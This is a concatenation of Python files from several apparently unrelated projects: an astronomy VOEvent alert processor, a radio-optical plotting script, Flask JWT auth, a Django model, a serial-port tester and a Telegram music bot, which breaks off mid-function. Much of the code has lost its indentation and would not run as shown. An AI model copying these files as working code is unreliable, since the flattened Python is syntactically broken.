from fourpisky.sites import AmiLA, Pt5m
from fourpisky.triggers import (is_test_trigger, swift, asassn, gaia)
import fourpisky as fps
logger = logging.getLogger(__name__)
# -------------------------------------------------------------------------------
# Definitions
grb_contacts = contacts.grb_contacts
amicomms.email_address = contacts.test_contacts[0].email
default_archive_root = os.path.join(os.environ["HOME"],
"voevent-deploy", "voe_archive")
active_sites = [AmiLA, Pt5m]
# -------------------------------------------------------------------------------
@click.command()
def cli():
fourpisky.log_config.setup_logging("process_voevent")
stdin_binary = click.get_binary_stream('stdin')
v = voeventparse.loads(stdin_binary.read())
voevent_logic(v)
return 0
def voevent_logic(v):
# SWIFT BAT GRB alert:
try:
if swift.BatGrb.packet_type_matches(v):
swift_bat_grb_logic(v)
if asassn.AsassnAlert.packet_type_matches(v):
asassn_alert_logic(v)
if gaia.GaiaAlert.packet_type_matches(v):
gaia_alert_logic(v)
if is_test_trigger(v):
test_logic(v)
except:
logger.exception("Error processing voevent {}".format(v.attrib['ivorn']))
# archive_voevent(v, rootdir=default_archive_root)
def swift_bat_grb_logic(v):
actions_taken = []
alert = swift.BatGrb(v)
alert_rejection = alert.reject()
if alert_rejection is None:
ami_reject = fps.filters.ami.reject(alert.position)
if ami_reject is None:
try:
trigger_ami_swift_grb_alert(alert)
actions_taken.append('Observation requested from AMI.')
try:
send_initial_ami_alert_vo_notification(alert)
actions_taken.append(
'AMI request notified to VOEvent network.')
except subprocess.CalledProcessError as e:
emsg = '***Notification to VOEvent network failed.***'
logger.warn(emsg)
actions_taken.append(emsg)
except Exception as e:
emsg = 'Observation request failed.'
actions_taken.append(emsg)
logger.error(emsg)
raise
else:
actions_taken.append('Target unsuitable for ami: ' + ami_reject)
else:
actions_taken.append('Alert ignored: ' + alert_rejection)
logger.info("Swift BAT GRB packet received, actions taken:\n{}".format(
actions_taken
))
report = generate_report_text(alert, active_sites, actions_taken)
send_report(subject=alert.full_name, text=report, contacts=grb_contacts)
def asassn_alert_logic(v):
actions_taken = []
alert = asassn.AsassnAlert(v)
if alert.is_recent():
report = generate_report_text(alert, active_sites, actions_taken)
send_report(subject=alert.full_name, text=report, contacts=grb_contacts)
def gaia_alert_logic(v):
actions_taken = []
alert = gaia.GaiaAlert(v)
if alert.is_recent():
report = generate_report_text(alert, active_sites, actions_taken)
send_report(subject=alert.full_name, text=report,
contacts=grb_contacts)
# =============================================================================
# Subroutines
def trigger_ami_swift_grb_alert(alert):
assert isinstance(alert, swift.BatGrb)
target_name = alert.id
comment = alert.id + " / " + alert.inferred_name
duration = datetime.timedelta(hours=2.)
ami_request = amicomms.request_email(
target_coords=alert.position,
target_name=target_name,
duration=duration,
timing='ASAP',
action='CHECK',
requester=amicomms.default_requester,
comment=comment)
fps.comms.email.send_email(recipient_addresses=amicomms.email_address,
subject=amicomms.request_email_subject,
body_text=ami_request)
def send_initial_ami_alert_vo_notification(alert):
notification_timestamp = datetime.datetime.utcnow()
request_status = {
'sent_time': notification_timestamp,
'acknowledged': False,
}
stream_id = notification_timestamp.strftime(
fps.formatting.datetime_format_short)
v = fps.voevent.create_ami_followup_notification(alert,
stream_id=stream_id,
request_status=request_status)
fps.comms.comet.send_voevent(v, contacts.local_vobroker.ipaddress,
contacts.local_vobroker.port)
def test_logic(v):
now = datetime.datetime.now(pytz.utc)
stream_id = v.attrib['ivorn'].partition('#')[-1]
response = fps.voevent.create_4pisky_test_response_voevent(
stream_id=stream_id,
date=now)
fps.comms.comet.send_voevent(response, contacts.local_vobroker.ipaddress,
contacts.local_vobroker.port)
report = generate_testresponse_text(now)
send_report(subject='Test packet received', text=report,
contacts=contacts.test_contacts)
```
#### File: tests/resources/__init__.py
```python
import fourpisky.comms.email
import fourpisky.comms.comet
import fourpisky.reports
from fourpisky.local import amicomms_safe
def dearm_for_tests():
fourpisky.comms.email.send_email = fourpisky.comms.email.dummy_email_send_function
fourpisky.comms.comet.send_voevent = fourpisky.comms.comet.dummy_send_to_comet_stub
test_prefix = "[LOCALTEST] "
if fourpisky.reports.notification_email_prefix[
:len(test_prefix)] != test_prefix:
fourpisky.reports.notification_email_prefix = (
test_prefix + fourpisky.reports.notification_email_prefix)
# Do NOT email AMI
amicomms_safe.email_address = 'blocked!' + amicomms_safe.email_address
```
#### File: fourpisky/tests/test_templates.py
```python
import datetime
import unittest
from fourpisky.reports import generate_testresponse_text
from fourpisky.tests.resources import greenwich
from fourpisky.visibility import get_ephem
from fourpisky.formatting import datetime_format_long, format_datetime
import jinja2
from jinja2 import Environment, PackageLoader
env = Environment(loader=PackageLoader('fourpisky', 'templates'),
trim_blocks=True)
env.filters['datetime'] = format_datetime
#--------------------------------------------------------------
class TestSiteVisReport(unittest.TestCase):
def setUp(self):
self.time = greenwich.vernal_equinox_2012
self.sites = [greenwich.greenwich_site,
greenwich.anti_site]
self.template = env.get_template('includes/visibility_report.j2')
def test_tgt(tgt):
# print "----------------------------"
print("Target: ", tgt.ra, tgt.dec)
# print
for site in self.sites:
vis = get_ephem(tgt, site, self.time)
site_report = self.template.render(site=site,
vis=vis,
dt_style=datetime_format_long)
print(site_report)
# print "----------------------------"
#Export the function to the test cases:
self.test_tgt = test_tgt
print()
def test_never_vis(self):
self.test_tgt(greenwich.never_visible_source)
def test_circumpolar(self):
self.test_tgt(greenwich.circumpolar_north_transit_at_ve_m1hr)
def test_equatorial_up_now(self):
self.test_tgt(greenwich.equatorial_transiting_at_ve)
def test_testresponse_compose():
generate_testresponse_text(datetime.datetime.now())
```
#### File: fourpisky/tests/test_voevent.py
```python
from __future__ import absolute_import
from unittest import TestCase
import voeventparse as vp
from fourpisky.tests.resources import datapaths
import fourpisky.voevent as vo_subs
from fourpisky.triggers.swift import BatGrb
import datetime
import pytz
class TestFollowupVoevent(TestCase):
def test_initial_case(self):
with open(datapaths.swift_bat_grb_pos_v2) as f:
swift_alert = BatGrb(vp.load(f))
current_utc_time = datetime.datetime.utcnow().replace(tzinfo=pytz.UTC)
request_status = {'sent_time': current_utc_time,
'acknowledged': False,
}
v = vo_subs.create_ami_followup_notification(swift_alert,
stream_id=1,
request_status=request_status)
vp.assert_valid_as_v2_0(v)
with open('/tmp/test_voevent.xml', 'wb') as f:
vp.dump(v, f)
```
#### File: fourpisky/triggers/alertbase.py
```python
import voeventparse
from fourpisky.utils import convert_voe_coords_to_eqposn
from collections import OrderedDict
import datetime
import pytz
from fourpisky.requiredatts import RequiredAttributesMetaclass
class AlertBase(object):
__metaclass__ = RequiredAttributesMetaclass
_required_attributes = [
'alert_notification_period',
'id',
'inferred_name',
'isotime',
'ivorn',
'position',
'type_description',
]
@property
def full_name(self):
name = self.id
if self.inferred_name:
name+= ' / ' + self.inferred_name
return name
def is_recent(self):
if not self.alert_notification_period:
return True
now = datetime.datetime.utcnow().replace(tzinfo=pytz.UTC)
if (now - self.isotime) < self.alert_notification_period:
return True
return False
```
#### File: fourpisky/triggers/asassn.py
```python
import voeventparse
from collections import OrderedDict
import datetime
import pytz
from fourpisky.utils import convert_voe_coords_to_eqposn
from fourpisky.feeds.asassn import AsassnFeed, AsassnKeys
from fourpisky.triggers.alertbase import AlertBase
default_alert_notification_period = datetime.timedelta(days=4)
class AsassnAlert(AlertBase):
type_description = "ASASSN alert"
@staticmethod
def packet_type_matches(voevent):
ivorn = voevent.attrib['ivorn']
if ivorn.startswith(AsassnFeed.stream_ivorn_prefix):
return True
return False
def __init__(self, voevent,
alert_notification_period=None):
self.voevent = voevent
self.ivorn = self.voevent.attrib['ivorn']
self.alert_notification_period = alert_notification_period
if self.alert_notification_period is None:
self.alert_notification_period = default_alert_notification_period
if not AsassnAlert.packet_type_matches(voevent):
raise ValueError(
"Cannot instantiate AsassnAlert; packet header mismatch.")
group_params = voeventparse.get_grouped_params(self.voevent)
text_params_grp = group_params[AsassnFeed.text_params_groupname]
self.text_params = OrderedDict(
(k, d['value']) for k, d in text_params_grp.items())
url_params_grp = group_params[AsassnFeed.url_params_groupname]
self.url_params = OrderedDict(
(k, d['value']) for k, d in url_params_grp.items())
self.id = self.text_params.get(AsassnKeys.id_asassn)
if self.id is None:
self.id = self.text_params.get(AsassnKeys.id_other)
# Assigned name according to the 'why' section of voevent packet:
self.inferred_name = 'ASASSN @ '+self.text_params.get(AsassnKeys.detection_timestamp)
self.isotime = voeventparse.get_event_time_as_utc(self.voevent)
self.position = convert_voe_coords_to_eqposn(
voeventparse.get_event_position(self.voevent))
```
#### File: fourpisky/triggers/__init__.py
```python
from __future__ import absolute_import
import fourpisky.triggers.swift
from fourpisky.voevent import ivorn_base, test_trigger_substream
def is_test_trigger(voevent):
ivorn = voevent.attrib['ivorn']
if ivorn.startswith("ivo://"+ ivorn_base+'/'+test_trigger_substream+'#'):
return True
return False
```
#### File: fourpisky-core/fourpisky/utils.py
```python
import os
import string
try:
    from collections.abc import Sequence  # Python 3.3+
except ImportError:  # legacy Python fallback
    from collections import Sequence
from ephem import Equatorial, J2000
from fourpisky.visibility import DEG_PER_RADIAN
import voeventparse
import logging
logger = logging.getLogger(__name__)
def listify(x):
"""
Returns [x] if x is not already a list.
Used to make functions accept either scalar or array inputs -
simply `listify` a variable to make sure it's in list format.
"""
if (not isinstance(x, str)) and isinstance(x, Sequence):
return x
else:
return [x]
def ensure_dir(filename):
"""Ensure parent directory exists, so you can write to `filename`."""
d = os.path.dirname(filename)
if not os.path.exists(d):
os.makedirs(d)
def convert_voe_coords_to_eqposn(c):
"""Unit-checked conversion from voeventparse.Position2D -> astropysics FK5"""
acceptable_coord_sys = (
voeventparse.definitions.sky_coord_system.utc_fk5_geo,
voeventparse.definitions.sky_coord_system.utc_icrs_geo
)
if (c.system not in acceptable_coord_sys
or c.units != 'deg'):
raise ValueError(
"Unrecognised Coords type: %s, %s" % (c.system, c.units))
return Equatorial(c.ra / DEG_PER_RADIAN, c.dec / DEG_PER_RADIAN,
epoch=J2000)
def namedtuple_to_dict(nt):
return {key: nt[i] for i, key in enumerate(nt._fields)}
def sanitise_string_for_stream_id(unsafe_string):
"""
Removes any unhelpful characters (e.g. #,/,<space>,%) from a string.
We pass:
-Letters ([A-Za-z])
-digits ([0-9]),
-hyphens ("-"),underscores ("_"), colons (":"), and periods (".")
-Plus symbol ('+')
We replace '\', '/','#', and <space> by underscore.
"""
s = unsafe_string
if unsafe_string[0] == ".":
s = unsafe_string[1:]
return "".join(c for c in
s.replace('/', '_').replace('\\', '_'). \
replace('#', '_').replace(' ', '_')
if c in string.ascii_letters + string.digits + '_-:.+')
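# Illustrative example (not from the original source): the filtering above turns
#   sanitise_string_for_stream_id("ivo://foo/bar#2015 06")
# into "ivo:__foo_bar_2015_06" - slashes, '#' and spaces become underscores,
# anything outside the allowed character set is dropped, and a leading '.' is stripped.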
def archive_voevent_to_file(v, rootdir):
relpath, filename = v.attrib['ivorn'].split('//')[1].split('#')
filename += ".xml"
fullpath = os.path.sep.join((rootdir, relpath, filename))
ensure_dir(fullpath)
with open(fullpath, 'wb') as f:
voeventparse.dump(v, f)
logger.debug("Wrote voevent {} to {}".format(
v.attrib['ivorn'], fullpath
))
```
#### File: fourpisky-core/fourpisky/visibility.py
```python
from __future__ import absolute_import
import ephem
import math
import pytz
from collections import OrderedDict
DEG_PER_RADIAN = 180 / math.pi
# -----------------------------------------------------------------
class TargetStatusKeys():
"""A namespaced set of dict keys for visibility reports"""
site_lst = 'site_lst'
type = 'type'
visible_now = 'visible_now'
current_pos = 'current_position'
prev_transit_time = 'prev_transit_time'
prev_transit_pos = 'prev_transit_position'
next_transit_time = 'next_transit_time'
next_transit_pos = 'next_transit_position'
rise_time = 'rise_time'
set_time = 'set_time'
timeline = 'timeline'
def get_ephem(eq_posn, observer, current_time):
"""Get basic information on target visibility for a given site.
Returns a dict populated with relevant TargetStatusKeys.
"""
keys = TargetStatusKeys
assert isinstance(observer, ephem.Observer)
# Get times:
observer.date = current_time
fixedbody = ephem.FixedBody()
fixedbody._ra = eq_posn.ra
fixedbody._dec = eq_posn.dec
fixedbody._epoch = eq_posn.epoch
fixedbody.compute(observer)
result = {}
result[keys.site_lst] = str(observer.sidereal_time())
result[keys.current_pos] = (fixedbody.alt * DEG_PER_RADIAN,
fixedbody.az * DEG_PER_RADIAN)
result[keys.visible_now] = (fixedbody.alt > observer.horizon)
if fixedbody.neverup:
result[keys.type] = 'never'
return result
result[keys.next_transit_time] = pytz.utc.localize(
observer.next_transit(fixedbody).datetime())
result[keys.prev_transit_time] = pytz.utc.localize(
observer.previous_transit(fixedbody).datetime())
if fixedbody.circumpolar:
# Circumpolar
result[keys.type] = 'always'
events = ['previous_transit','next_transit' ]
else:
# Regular rise and set
result[keys.type] = 'sometimes'
events = [
'previous_rising', 'previous_transit', 'previous_setting',
'next_rising', 'next_transit', 'next_setting',
]
# Returns timezone unaware ('naive') datetimes
timeline = {}
for event_name in events:
observer_func = getattr(observer, event_name)
event_date = pytz.utc.localize(observer_func(fixedbody).datetime())
timeline[event_date] = event_name.replace('_',' ').capitalize()
timeline[current_time] = '(Trigger received)'
result[keys.timeline]=OrderedDict()
for dtime in sorted(timeline):
result[keys.timeline][dtime] = timeline[dtime]
transit_observer = ephem.Observer()
transit_observer.lon = observer.lon
transit_observer.lat = observer.lat
transit_observer.horizon = observer.horizon
transit_observer.date = result[keys.next_transit_time]
fixedbody.compute(transit_observer)
result[keys.next_transit_pos] = (fixedbody.alt * DEG_PER_RADIAN,
fixedbody.az * DEG_PER_RADIAN)
return result
```
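For orientation, a rough usage sketch of `get_ephem` (the observatory coordinates and target are invented for illustration; only pyephem and the function above are assumed):

```python
import datetime

import ephem

from fourpisky.visibility import get_ephem, TargetStatusKeys

# A hypothetical observing site and target, purely for illustration.
site = ephem.Observer()
site.lat, site.lon, site.horizon = '51.4769', '0.0', '0.0'

target = ephem.Equatorial('05:35:17', '-05:23:28', epoch=ephem.J2000)

report = get_ephem(target, site, datetime.datetime.utcnow())
print(report[TargetStatusKeys.type], report[TargetStatusKeys.visible_now])
```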
#### File: fourpisky-core/integration_tests/feed_voevent_to_celery.py
```python
import logging
import click
import fourpisky.voevent
import voeventparse
from fourpisky.taskqueue.tasks import process_voevent_celerytask
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
@click.command()
def cli():
click.echo("Attempting celery task")
test_packet = fourpisky.voevent.create_4pisky_test_trigger_voevent()
voevent_bytestring=voeventparse.dumps(test_packet)
process_voevent_celerytask.delay(voevent_bytestring)
click.echo("Task fired")
return 0
if __name__ == '__main__':
cli()
```
#### File: fourpisky-core/profiling/voevent-load-tester.py
```python
import multiprocessing
import fourpisky
import fourpisky.comms.comet
import fourpisky.voevent
import logging
import datetime
import time
import threading
from functools import wraps
import signal
import sys
logger = logging.getLogger('load-test')
def rate_limited(max_per_second):
"""
    Decorator that ensures the wrapped function is not called more often than
    max_per_second times per second.
"""
lock = threading.Lock()
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
@wraps(func)
def rate_limited_function(*args, **kwargs):
lock.acquire()
            elapsed = time.time() - last_time_called[0]  # wall-clock seconds since the last call
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
lock.release()
ret = func(*args, **kwargs)
            last_time_called[0] = time.time()
return ret
return rate_limited_function
return decorate
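# Illustrative usage of rate_limited (hypothetical example, not part of the original script):
#
#   @rate_limited(2)   # at most ~2 calls per second
#   def ping():
#       print("ping")
#
#   for _ in range(6):
#       ping()         # takes roughly three seconds in total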
def init_worker_to_ignore_sigint():
#Use the readymade 'SIG_IGN' (ignore signal) handler to handle SIGINT
signal.signal(signal.SIGINT, signal.SIG_IGN)
def generate_and_send_packet():
now = datetime.datetime.utcnow()
# uuid =fourpisky.voevent.generate_stream_id(now)
# return "UUID:"+uuid
try:
test_packet = fourpisky.voevent.create_4pisky_test_trigger_voevent()
dummy_packet = fourpisky.voevent.create_skeleton_4pisky_voevent(
substream="DUMMYPACKET",
stream_id=fourpisky.voevent.generate_stream_id(now),
date=now
)
sendpacket = dummy_packet
# sendpacket = test_packet
ivorn = sendpacket.attrib['ivorn']
fourpisky.comms.comet.send_voevent(sendpacket)
except Exception as e:
return "Error sending {}:\n {}".format(
ivorn, e.output)
return "Sent {}".format(ivorn)
def logger_callback(summary):
"""Used to return the 'job complete' log message in the master thread."""
if summary.startswith('Error'):
logger.error('There was an error:')
logger.error(summary)
else:
pass
# logger.info('*** Job complete: ' + summary)
def main():
n_threads = 6
n_events = 200
n_per_second = 15
pool = multiprocessing.Pool(n_threads,
initializer=init_worker_to_ignore_sigint)
results = []
start = datetime.datetime.utcnow()
@rate_limited(n_per_second)
def add_job_to_pool():
results.append(pool.apply_async(generate_and_send_packet,
callback=logger_callback
))
logging.info("Beginning run...")
try:
for i in range(n_events):
logger.debug('Sending event #{}'.format(i))
add_job_to_pool()
except KeyboardInterrupt:
logger.warning("Caught KeyboardInterrupt, terminating")
pool.terminate()
pool.join()
return 1
logging.info("... Done.")
n_fails = 0
resultset = set()
for obj in results:
# print res.get(), type(res.get())
summary = obj.get()
if summary.startswith('Error'):
n_fails += 1
resultset.add(summary)
end = datetime.datetime.utcnow()
assert len(resultset) == len(results)
time_taken = (end - start).total_seconds()
    print("Sent {} events in {} seconds".format(
        n_events, time_taken
    ))
    print("Rate: {} /second ".format(n_events / time_taken))
    print("Or {} /second/thread".format(n_events / time_taken / n_threads))
    print("{} failed (proportion {})".format(n_fails, float(n_fails) / n_events))
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
sys.exit(main())
``` |
{
"source": "4pisky/radio-optical-transients-plot",
"score": 3
} |
#### File: radio_optical_transients_plot/bin/radio_optical_figures.py
```python
import argparse
import matplotlib.pyplot as plt
from radio_optical_transients_plot.ro_main import (
RadioOpticalPlot, RadioOpticalTrackPlot
)
def parse_args() -> argparse.Namespace:
"""
Parse the arguments.
Returns:
The argument namespace.
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"--figure",
type=str,
choices=[
'1', '2', '3', '4', '5a', '5b',
'6a', '6b', '6c', '6d', '7', '8a', '8b', '9',
'a1a', 'a1b', 'a2', 'a3', 'a4'
],
required=True,
help="Specify what figure to produce."
)
parser.add_argument(
"-s",
"--save",
action="store_true",
default=False,
help=(
"Use this option to automatically save the figures "
"instead of displaying."
)
)
parser.add_argument(
"-f",
"--save-format",
default='png',
choices=['png', 'pdf'],
help=(
"Select the format the figure will be saved as."
)
)
args = parser.parse_args()
return args
def main() -> None:
"""The main function.
Returns:
None
"""
# numexpr.set_num_threads(2)
args = parse_args()
f_num = args.figure
if f_num == "1":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.generate_plot()
if f_num == "2":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.generate_plot(
meerkat=True, show_complete=True, square=True,
hide_line_labels=True
)
if f_num == "3":
plot = RadioOpticalPlot(group_stellar=True, group_agn=True)
fig = plot.generate_plot(
square=True, hide_line_labels=True, schematic_cover=True
)
if f_num == "4":
plot = RadioOpticalPlot(group_agn=True)
fig = plot.generate_plot(
square=True, hide_line_labels=True,
background=True, hide_arrow=True, zoom_plot="0.5,9e-3,2e9,1e3",
color_list=(
"Stellar: Star,Stellar: RS CVn,Stellar: Algol,"
"Stellar: Variable Star,Stellar: "
"Symbiotic,Stellar: YSO,Stellar: Other,CV"
),
)
if f_num == "5a":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
group_tracks=True, summary_style=True, hide_line_labels=True,
background=True, zoom_plot="1.43977e-5,0.00580767,111849,27519.4"
)
if f_num == "5b":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
group_tracks=True, summary_style=True, hide_line_labels=True,
background=True, start_end_only=True,
zoom_plot="1.43977e-5,0.00580767,111849,27519.4"
)
if f_num == "6a":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="0.00653281,0.161976,6671.47,5035.9",
only_types=["XRB"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("XRBs", 1000, 2000, fontsize=30, weight='bold')
if f_num == "6b":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="1.74873,0.0457012,31154.5,108.112",
only_types=["CV"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("CVs", 2.5, 0.06, fontsize=30, weight='bold')
if f_num == "6c":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="0.00434,0.0710829,540.484,1028.08",
only_types=["SN"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("SNe", 100, 300, fontsize=30, weight='bold')
if f_num == "6d":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="1.52e-5,0.009319,17.2954,63.4996",
only_types=["GRB"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("GRBs", 0.00003, 0.013, fontsize=30, weight='bold')
if f_num == "7":
plot = RadioOpticalPlot(group_stellar=True, group_agn=True)
fig = plot.ratio_histogram()
if f_num == "8a":
plot = RadioOpticalPlot(
group_stellar=True, group_agn=True,
transients_file="Stripe82_QSOs.txt"
)
fig = plot.generate_plot(
background=True,
color_list="Quasar,GRB",
zoom_plot="5.4363e-5,0.0183888,362.768,5511.11",
hide_arrow=True,
hide_line_labels=True,
square=True
)
if f_num == "8b":
plot = RadioOpticalPlot(
group_stellar=True, group_agn=True
)
fig = plot.generate_plot(
background=True,
highlight_list="Quasar,Stellar",
hide_arrow=True,
hide_line_labels=True,
push_agn=True,
push_stellar_dist=1000,
square=True
)
if f_num == "9":
plot = RadioOpticalPlot(
group_stellar=True, group_agn=True,
transients_file="transient_master_table_04072013.txt"
)
fig = plot.generate_plot(
background=True,
hide_diag_line_labels=True,
exclude_type=(
'FIRST Quasar (SDSS Star),FIRST Quasar (SDSS Gal.),'
'PSR J1012+5307 (Variable)'
)
)
if f_num == "a1a":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.frequency_histogram()
if f_num == "a1b":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.band_histogram()
if f_num == "a2":
plot = RadioOpticalPlot()
fig = plot.qso_z_histogram()
if f_num == "a3":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.stellar_distance_histogram()
if f_num == "a4":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.grb_z_histogram()
if args.save:
save_name = f'ro_figure_{f_num}.{args.save_format}'
fig.savefig(
save_name, bbox_inches='tight'
)
print(f'Saved {save_name}.')
else:
plt.show()
if __name__ == '__main__':
main()
``` |
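Beyond the CLI presets above, the same classes can be driven directly; a minimal sketch (the figure choice and output filename are arbitrary examples):

```python
import matplotlib.pyplot as plt

from radio_optical_transients_plot.ro_main import RadioOpticalPlot

# Reproduce something close to figure 1 and save it by hand.
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.generate_plot()
fig.savefig("ro_figure_custom.png", bbox_inches="tight")
plt.close(fig)
```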
{
"source": "4piu/flask-example",
"score": 2
} |
#### File: flask-example/src/main.py
```python
import copy
import json
import os
import signal
import sys
import shared
def main():
# load config file and init globals
if len(sys.argv) > 1:
app_config_path = sys.argv[1]
elif os.getenv("ENV", "PROD") == "PROD":
app_config_path = "./app_config.yml"
else:
app_config_path = "./config/app_config.yml"
shared.init(config_file=app_config_path)
logger = shared.get_logger("main")
config = copy.deepcopy(shared.config)
if os.getenv("ENV", "PROD") == "PROD":
sensitive_keys = ["mysql_database", "mysql_user", "mysql_password"]
for key in sensitive_keys:
config[key] = "***"
logger.info(f"config loaded: \n{json.dumps(config, indent=2)}")
signal.signal(signal.SIGTERM, lambda s, f: os.kill(os.getpid(), signal.SIGINT))
import server
try:
server.run()
except KeyboardInterrupt:
logger.warning("SIGINT received, exit")
server.stop()
sys.exit(0)
if __name__ == "__main__":
main()
```
#### File: src/utility/Auth.py
```python
from shared import jwt_util
from utility.ApiException import *
class Auth:
valid_after: float = None
@staticmethod
def get_payload(request):
token = request.headers.get('Authorization')
if not token:
raise ApiPermissionException("Permission denied: not logged in")
token = str.replace(str(token), 'Bearer ', '')
try:
token_info = jwt_util.decode_token(token, audience='access')
except:
raise ApiPermissionException("Permission denied: invalid token")
if Auth.valid_after and token_info["role"] != "ADMIN" and token_info["iat"] < Auth.valid_after:
raise ApiPermissionException("Permission denied: expired token")
return token_info
``` |
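A rough sketch of how a route might use this helper (the `/me` endpoint and its response shape are invented for illustration; only `Auth.get_payload` and `ApiPermissionException` come from the code above):

```python
from flask import Flask, jsonify, request

from utility.Auth import Auth
from utility.ApiException import ApiPermissionException

app = Flask(__name__)

@app.route("/me")
def me():
    # Reject the request unless a valid Bearer access token is presented.
    try:
        payload = Auth.get_payload(request)
    except ApiPermissionException as e:
        return jsonify(message=str(e)), 403
    return jsonify(role=payload.get("role"))
```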
{
"source": "4plus39/mysite",
"score": 2
} |
#### File: mysite/member/models.py
```python
from django.db import models
from django.utils import timezone
# Create your models here.
class Post(models.Model):
name = models.CharField(max_length=20)
number = models.CharField(max_length=10)
email = models.CharField(max_length=30)
created_date = models.DateTimeField(default=timezone.now)
    updated_date = models.DateTimeField('update time', auto_now=True)
def __str__(self):
return self.name
``` |
{
"source": "4plus39/py-serial-test",
"score": 3
} |
#### File: 4plus39/py-serial-test/main.py
```python
import os
import keyboard
import time
import testio
import record
from const import *
def pause():
try:
input("\n Press the <ENTER> key to continue...")
except SyntaxError:
pass
clear_screen()
def clear_screen():
if ser.system.lower() == "linux":
os.system("clear")
elif ser.system.lower() == "windows":
os.system("cls")
def testing():
rec.timer_start()
while not keyboard.is_pressed('q'):
ser.send()
rec.cnt += 1
if not ser.read():
clear_screen()
print("----------------------------")
print(" Status: FAILED ")
rec.fcnt += 1
else:
clear_screen()
print("----------------------------")
print(" Status: PASS ")
print("----------------------------")
print(" Serial port =", ser.name)
print(" Baud rate =", BAUD_RATE)
print(" Time out =", TIMEOUT)
print("----------------------------")
print(" Program is ongoing ", end='')
if int(time.time()) % 3 == 1:
print(".")
elif int(time.time()) % 3 == 2:
print("..")
else:
print("...")
print(" Press key 'Q' to quit")
rec.timer_end()
if __name__ == '__main__':
ser = testio.SerialPort(None)
rec = record.Log()
ser.scan()
ser.check()
clear_screen()
print("----------------------------------")
ser.list()
print("----------------------------------")
ser.input()
print('----------------------------------')
ser.config(BAUD_RATE, TIMEOUT)
if ser.port.is_open:
print(" Serial port [ %s ] is open" % ser.name)
pause()
testing()
ser.close()
rec.cfg_output(ser.name)
clear_screen()
if rec.end_ts is not None and rec.start_ts is not None:
rec.log_output(ser.name)
``` |
{
"source": "4-pm/TeleMusickAnywhere",
"score": 2
} |
#### File: 4-pm/TeleMusickAnywhere/index.py
```python
import telebot
from main import bot
def handler(event, _):  # entry point that forwards incoming requests to the bot (Yandex Cloud Function)
message = telebot.types.Update.de_json(event['body'])
bot.process_new_updates([message])
return {
'statusCode': 200,
'body': '!',
}
```
#### File: 4-pm/TeleMusickAnywhere/main.py
```python
import os
from difflib import SequenceMatcher
import requests
import telebot
from telebot import types
from data import db_session
from data.songs import Song
from data.profile import Users
from image_ot_qr import QR_Operation
from speech import Recognition
db_session.global_init("db/musik.db")  # initialise the sqlalchemy session
URL = "https://api.telegram.org/bot"
with open("keys/apikey") as f:
__APIKEY__ = f.readline()
with open("keys/paykey") as f:
__PAYKEY__ = f.readline()
bot = telebot.TeleBot(__APIKEY__)
users_step = {}
# dictionary of user states (a rough analogue of a dynamic json file)
# keyboard buttons
find_musick = types.KeyboardButton("Найти музыку")
add_musick = types.KeyboardButton("Добавить музыку")
other = types.KeyboardButton("Еще")
user = types.KeyboardButton("Профиль")
profile_statistic = types.KeyboardButton("Статистика")
adv = types.KeyboardButton("Реклама")
text = types.KeyboardButton("Текст")
voice = types.KeyboardButton("Голос")
yes = types.KeyboardButton("Да")
eng = types.KeyboardButton("Английский")
rus = types.KeyboardButton("Русский")
back_button = types.KeyboardButton("Назад")
qr_button = types.KeyboardButton("QR код")
share = types.KeyboardButton("Поделиться")
# this decorator declares which message types are handled
@bot.message_handler(content_types=["text",
                                    "start"])
# by this function (text messages and the start command)
def main(message):
    if message.from_user.id not in users_step:  # check whether the user is already known
users_step[message.from_user.id] = "home"
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(
        Users.user_id == message.from_user.id).first()  # check whether the user exists in the db
if user_table == None:
user_table = Users()
        # set the default values
user_table.user_id = message.chat.id
user_table.listen_statistic = '0'
user_table.add_statistic = '0'
user_table.ads_statistic = '0'
db_sess.add(user_table)
db_sess.commit()
    if (message.text == "/start" or message.text == "Назад"):  # go back home (start command or "Back" button)
        users_step[message.from_user.id] = "home"  # update the user's position in the state dict
        markup = types.ReplyKeyboardMarkup(resize_keyboard=True)  # button style
        markup.add(find_musick, add_musick, other)  # add the buttons
        bot.send_message(message.chat.id,  # send the reply
                         text="Привет, {0.first_name}! Я тестируюсь".format(message.from_user), reply_markup=markup)
    # all the following branches do the same thing, differing only in buttons and user state
elif (message.text == "Еще"):
users_step[message.from_user.id] = "other"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, user, adv)
bot.send_message(message.chat.id, text="Дополнительные функции", reply_markup=markup)
elif (message.text == "Реклама"):
users_step[message.from_user.id] = "schearch_for_adv"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
